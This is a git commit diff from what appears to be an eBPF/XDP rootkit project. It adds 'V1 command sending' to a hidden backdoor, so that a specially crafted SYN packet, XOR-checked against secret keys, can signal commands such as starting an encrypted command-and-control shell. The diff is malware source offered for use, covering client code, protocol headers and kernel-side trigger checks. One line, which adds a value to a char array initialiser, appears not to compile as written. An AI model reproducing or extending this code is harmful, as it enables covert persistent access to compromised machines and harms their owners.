Added V1 command sending via secret trigger on backdoor

2025-12-16 23:33:06 +08:00 · 2022-05-05 12:59:02 -04:00
parent ead4a4ca68
commit 2deebf1b9e
7 changed files with 1712 additions and 1669 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -204,7 +204,8 @@ void activate_command_control_shell_encrypted(char* argv){
    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
-    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;
+    //K3 with command to start the encrypted connection with the backdoor
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3 + CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1;
    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -1,6 +1,8 @@
 #ifndef __BPF_CC_H
 #define __BPF_CC_H

+#include "protocol.h"
+
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"
--- a/src/common/protocol.h
+++ b/src/common/protocol.h
@@ -1,6 +1,16 @@
 #ifndef __PROTOCOL_H
 #define __PROTOCOL_H

+//V1
+
+//Value added to K3 to define command to send
+#define CC_PROT_K3_TOTAL_DEFINED_KEYS_V1 1
+#define CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1 0x00
+
+
+
+
+//V2
 struct trigger_t {
    unsigned char xor_key;
    unsigned int ip;
@@ -11,4 +21,5 @@ struct trigger_t {
 };


+
 #endif
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -46,20 +46,42 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
        }
    }

-    //S1 XOR K1 XOR S2 XOR K2 XOR K3
+    //S1 XOR K1 XOR S2 XOR K2 XOR (K3+COMMAND VALUE)
    __builtin_memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    __builtin_memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
-        result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
-        if(result3[ii]!=key3[ii]){
-            bpf_printk("FAIL CHECK 3\n");
-            return XDP_PASS;
+    int correct = 1;
+    int command_received = -1;
+    for(int jj=0; jj<CC_PROT_K3_TOTAL_DEFINED_KEYS_V1; jj++){
+        for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+            result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
+            if(result3[ii]!=(key3[ii] + jj)){
+                correct = 0;
+            }
        }
+        if(correct == 1){
+            //Found valid k3 value
+            command_received = jj;
+            break;
+        }
+        
+    }
+    if(correct == 0){
+        bpf_printk("FAIL CHECK 3\n");
+        return XDP_PASS;
    }

    //If we reach this point then we received trigger packet
-    bpf_printk("Finished backdoor V1 check\n");
+    bpf_printk("Finished backdoor V1 check with success\n");
+    switch(command_received){
+        case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
+            bpf_printk("Received request to start encrypted connection\n");
+            break;
+        default:
+            bpf_printk("Command received unknown: %d\n", command_received);
+    }
+
+
    return XDP_DROP;